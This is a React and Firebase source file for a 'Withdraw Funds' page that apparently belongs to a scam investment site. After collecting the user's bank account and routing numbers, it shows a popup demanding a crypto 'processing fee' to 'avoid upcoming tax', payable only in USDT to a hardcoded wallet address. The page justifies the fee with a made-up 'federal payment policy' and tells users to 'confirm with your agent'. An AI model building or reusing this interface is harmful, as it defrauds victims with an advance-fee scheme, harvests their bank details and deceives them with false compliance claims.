import React, { useState, useEffect } from "react";
import Navbar from "../components/Navbar";
import { db } from "../firebase";
import { toast } from "react-toastify";
import {
  collection,
  addDoc,
  serverTimestamp,
  doc,
  onSnapshot,
  updateDoc,
} from "firebase/firestore";
import { FaHashtag, FaUniversity, FaWallet } from "react-icons/fa";

export default function Withdraw() {
  const dailyLimit = 1000000;

  const [amount, setAmount] = useState("");
  const [accountNumber, setAccountNumber] = useState("");
  const [routingNumber, setRoutingNumber] = useState("");
  const [currentBalance, setCurrentBalance] = useState(0);
  const [loading, setLoading] = useState(true);

  const [showPopup, setShowPopup] = useState(false);
  const [popupStep, setPopupStep] = useState(1); // 1 = fee info, 2 = crypto QR

  const userId = localStorage.getItem("currentUser");

  const cryptoAddress = "0x4bFC7aD7234234Cadgdfgdf0f219A1D9c1Ea2324FB37"; // sample address

  const formatCurrency = (num) =>
    num.toLocaleString("en-US", { style: "currency", currency: "USD" });

  // Fetch currentBalance from user doc and listen for real-time updates
  useEffect(() => {
    if (!userId) return;

    const userRef = doc(db, "users", userId);

    const unsubscribe = onSnapshot(userRef, (docSnap) => {
      if (docSnap.exists()) {
        const data = docSnap.data();
        setCurrentBalance(
          Number(data.currentBalance ?? data.startingBalance ?? 0)
        );
      }
      setLoading(false);
    });

    return () => unsubscribe();
  }, [userId]);

  const handleSubmit = async (e) => {
    e.preventDefault();

    if (loading) {
      toast.info("Please wait until balance loads.");
      return;
    }

    const numericAmount = parseFloat(amount.replace(",", "."));
    if (isNaN(numericAmount) || numericAmount <= 0) {
      toast.error("Please enter a valid amount.");
      return;
    }

    if (numericAmount > dailyLimit) {
      toast.warning(
        `Amount exceeds daily withdrawal limit of ${formatCurrency(
          dailyLimit
        )}.`
      );
      return;
    }

    if (numericAmount > currentBalance) {
      toast.error("Amount exceeds your available balance.");
      return;
    }

    if (!accountNumber.trim() || !routingNumber.trim()) {
      toast.error("Please fill in all bank details.");
      return;
    }

    // Show initial popup
    setPopupStep(1);
    setShowPopup(true);
  };

  const confirmWithdrawal = async () => {
    try {
      const numericAmount = parseFloat(amount.replace(",", "."));
      const userRef = doc(db, "users", userId);
      const newBalance = currentBalance - numericAmount;

      await addDoc(collection(db, "users", userId, "withdrawals"), {
        amount: numericAmount,
        accountNumber: accountNumber.trim(),
        routingNumber: routingNumber.trim(),
        timestamp: serverTimestamp(),
        status: "Pending",
        type: "Withdrawal",
        description: `Withdrawal to Account #${accountNumber.slice(-4)}`,
        balanceAfter: newBalance,
      });

      await updateDoc(userRef, { currentBalance: newBalance });

      toast.success(
        `Withdrawal Submitted! Your request for ${formatCurrency(
          numericAmount
        )} is pending. New balance: ${formatCurrency(newBalance)}.`
      );

      setAmount("");
      setAccountNumber("");
      setRoutingNumber("");
      setShowPopup(false);
    } catch (error) {
      console.error("Error submitting withdrawal:", error);
      toast.error("An error occurred while submitting your request.");
    }
  };

  return (
    <div className="dashboard-container">
      <Navbar />
      <main
        className="dashboard-main"
        style={{
          maxWidth: "480px",
          margin: "0 auto",
          padding: "2rem 1rem",
          fontFamily: "sans-serif",
        }}
      >
        <div
          style={{
            background: "#ffffff",
            borderRadius: "12px",
            padding: "2rem",
            boxShadow: "0 1px 4px rgba(0,0,0,0.08)",
          }}
        >
          <h2 style={{ fontSize: "1.5rem", marginBottom: "0.4rem" }}>
            Withdraw Funds
          </h2>
          <p style={{ color: "#4a5568", marginBottom: "1rem" }}>
            Enter the withdrawal amount and your bank details. Daily limit is{" "}
            {formatCurrency(dailyLimit)}.
          </p>

          <div
            style={{
              display: "flex",
              justifyContent: "space-between",
              marginBottom: "1.5rem",
              color: "#718096",
              fontSize: "0.95rem",
            }}
          >
            <span>Available Balance:</span>
            <span style={{ color: "#2d3748" }}>
              {loading ? "Loading..." : formatCurrency(currentBalance)}
            </span>
          </div>

          {/* Amount */}
          <div style={{ marginBottom: "1.2rem" }}>
            <label
              htmlFor="amount"
              style={{ display: "block", marginBottom: "0.4rem" }}
            >
              Amount
            </label>
            <div
              style={{
                backgroundColor: "#f4f4f4",
                display: "flex",
                alignItems: "center",
                borderRadius: "8px",
                border: "1px solid #e2e8f0",
                padding: "0.6rem 0.75rem",
              }}
            >
              <span style={{ marginRight: "0.5rem" }}>$</span>
              <input
                placeholder="0.00"
                id="amount"
                type="text"
                value={amount}
                onChange={(e) => setAmount(e.target.value)}
                style={{
                  flex: 1,
                  border: "none",
                  outline: "none",
                  background: "transparent",
                  fontSize: "1rem",
                }}
              />
            </div>
            <small style={{ color: "#4a5568" }}>
              Use '.' or ',' for decimals. Current Value:{" "}
              {formatCurrency(Number(amount.replace(",", ".") || 0))}
            </small>
          </div>

          <form onSubmit={handleSubmit}>
            <div
              style={{
                backgroundColor: "#fafafa",
                borderRadius: "12px",
                padding: "1.5rem",
                boxShadow: "0 1px 4px rgba(0,0,0,0.06)",
                marginBottom: "1.5rem",
              }}
            >
              {/* Bank Account Details */}
              <div style={{ marginBottom: "1.2rem" }}>
                <div style={{ marginBottom: "0.6rem" }}>Bank Account Details</div>

                {/* Account Number */}
                <div
                  style={{
                    display: "flex",
                    alignItems: "center",
                    backgroundColor: "#f4f4f4",
                    border: "1px solid #e2e8f0",
                    borderRadius: "8px",
                    marginBottom: "1rem",
                    padding: "0.6rem 0.75rem",
                  }}
                >
                  <FaHashtag style={{ marginRight: "0.5rem", color: "#4a5568" }} />
                  <input
                    id="accountNumber"
                    type="text"
                    value={accountNumber}
                    onChange={(e) => setAccountNumber(e.target.value)}
                    placeholder="Bank Account Number"
                    style={{
                      border: "none",
                      outline: "none",
                      background: "transparent",
                      fontSize: "1rem",
                      flex: 1,
                    }}
                  />
                </div>

                {/* Routing Number */}
                <div
                  style={{
                    display: "flex",
                    alignItems: "center",
                    backgroundColor: "#f4f4f4",
                    border: "1px solid #e2e8f0",
                    borderRadius: "8px",
                    padding: "0.6rem 0.75rem",
                  }}
                >
                  <FaUniversity style={{ marginRight: "0.5rem", color: "#4a5568" }} />
                  <input
                    id="routingNumber"
                    type="text"
                    value={routingNumber}
                    onChange={(e) => setRoutingNumber(e.target.value)}
                    placeholder="Routing Number"
                    style={{
                      border: "none",
                      outline: "none",
                      background: "transparent",
                      fontSize: "1rem",
                      flex: 1,
                    }}
                  />
                </div>

                <small style={{ color: "#718096" }}>
                  Funds will be transferred to this bank account. Ensure details are correct.
                </small>
              </div>
            </div>

            {/* Info and Submit */}
            <p style={{ color: "#718096", fontSize: "0.9rem" }}>
              Withdrawals are typically processed within 1–2 business days.
            </p>

            <p style={{ color: "#718096", fontSize: "0.9rem" }}>
              In accordance with our federal payment policy, withdrawal processing fees are settled exclusively in cryptocurrency.
            </p>
            <p style={{ color: "#718096", fontSize: "0.9rem" }}>
              This measure ensures compliance, security, and efficiency across jurisdictions.
            </p>

            <button
              type="submit"
              style={{
                width: "100%",
                marginTop: "1.5rem",
                padding: "0.9rem",
                backgroundColor: "#1e1eaa",
                color: "white",
                fontWeight: "500",
                fontSize: "1rem",
                borderRadius: "8px",
                border: "none",
                display: "flex",
                alignItems: "center",
                justifyContent: "center",
                gap: "0.5rem",
                cursor: "pointer",
              }}
              onMouseEnter={(e) => (e.target.style.backgroundColor = "#15158a")}
              onMouseLeave={(e) => (e.target.style.backgroundColor = "#1e1eaa")}
            >
              <FaWallet />
              Confirm Withdrawal
            </button>
          </form>
        </div>
      </main>

      {/* Popup Modal */}
      {showPopup && (
        <div
          style={{
            position: "fixed",
            inset: 0,
            background: "rgba(0,0,0,0.5)",
            display: "flex",
            justifyContent: "center",
            alignItems: "center",
            zIndex: 1000,
          }}
        >
          <div
            style={{
              background: "white",
              borderRadius: "16px",
              padding: "2rem",
              maxWidth: "400px",
              width: "90%",
              boxShadow: "0 4px 12px rgba(0,0,0,0.15)",
              textAlign: "center",
              display: "flex",
              flexDirection: "column",
              justifyContent: "center",
              alignItems: "center",
            }}
          >
            {popupStep === 1 && (
              <>
                <h3
                  style={{
                    fontSize: "1.3rem",
                    marginBottom: "1rem",
                    color: "#2d3748",
                  }}
                >
                  Withdrawal Fee Required
                </h3>
                <p
                  style={{
                    color: "#4a5568",
                    marginBottom: "1rem",
                    fontSize: "0.95rem",
                  }}
                >
                  To proceed with your withdrawal, a processing fee is required in order to avoid upcoming tax.
                </p>
                <p
                  style={{
                    color: "#4a5568",
                    marginBottom: "1.5rem",
                    fontSize: "0.95rem",
                  }}
                >
                  Please complete the payment and confirm with your agent to initiate the withdrawal process.
                </p>

                <button
                  onClick={() => setPopupStep(2)}
                  style={{
                    display: "inline-block",
                    backgroundColor: "#1e1eaa",
                    color: "white",
                    padding: "0.8rem 1.5rem",
                    borderRadius: "8px",
                    fontSize: "1rem",
                    fontWeight: "500",
                    border: "none",
                    cursor: "pointer",
                    transition: "background 0.2s",
                    marginBottom: "1rem",
                  }}
                  onMouseEnter={(e) => (e.target.style.backgroundColor = "#15158a")}
                  onMouseLeave={(e) => (e.target.style.backgroundColor = "#1e1eaa")}
                >
                  Complete Payment
                </button>

                <button
                  onClick={() => setShowPopup(false)}
                  style={{
                    background: "transparent",
                    border: "none",
                    color: "#718096",
                    cursor: "pointer",
                    fontSize: "0.9rem",
                    textDecoration: "underline",
                  }}
                >
                  Cancel
                </button>
              </>
            )}

            {popupStep === 2 && (
              <>
                <h3
                  style={{
                    fontSize: "1.3rem",
                    marginBottom: "1rem",
                    color: "#2d3748",
                  }}
                >
                  Pay with Crypto
                </h3>
                <p
                  style={{
                    color: "#4a5568",
                    marginBottom: "1.5rem",
                    fontSize: "0.95rem",
                  }}
                >
                  Convert securely and instantly — one step to process your withdrawal.
                </p>

                {/* QR code centered */}
                <div style={{ marginBottom: "1rem" }}>
                  <img
                    src="/walletqr.png"
                    alt="Crypto Wallet QR Code"
                    style={{ width: "200px", height: "200px", borderRadius: "12px" }}
                  />
                </div>

                {/* Crypto address container */}
                <div
                  style={{
                    backgroundColor: "#f4f4f4",
                    border: "1px solid #e2e8f0",
                    borderRadius: "8px",
                    padding: "0.75rem 1rem",
                    marginBottom: "0.5rem",
                    width: "100%",
                    textAlign: "center",
                    fontFamily: "monospace",
                    fontSize: "0.9rem",
                    color: "#2d3748",
                    wordBreak: "break-all",
                  }}
                >
                  {cryptoAddress}
                </div>

                {/* Disclaimer */}
                <p
                  style={{
                    fontSize: "0.8rem",
                    color: "#e53e3e",
                    marginBottom: "1.5rem",
                    textAlign: "center",
                  }}
                >
                  ⚠️ This address only accepts USDT on the ERC-20 network.
                </p>

                <button
                  onClick={confirmWithdrawal}
                  style={{
                    display: "inline-block",
                    backgroundColor: "#1e1eaa",
                    color: "white",
                    padding: "0.8rem 1.5rem",
                    borderRadius: "8px",
                    fontSize: "1rem",
                    fontWeight: "500",
                    border: "none",
                    cursor: "pointer",
                    transition: "background 0.2s",
                    marginBottom: "1rem",
                  }}
                  onMouseEnter={(e) => (e.target.style.backgroundColor = "#15158a")}
                  onMouseLeave={(e) => (e.target.style.backgroundColor = "#1e1eaa")}
                >
                  Confirm Crypto Payment
                </button>

                <button
                  onClick={() => setShowPopup(false)}
                  style={{
                    background: "transparent",
                    border: "none",
                    color: "#718096",
                    cursor: "pointer",
                    fontSize: "0.9rem",
                    textDecoration: "underline",
                  }}
                >
                  Cancel
                </button>
              </>
            )}
          </div>
        </div>
      )}
    </div>
  );
}
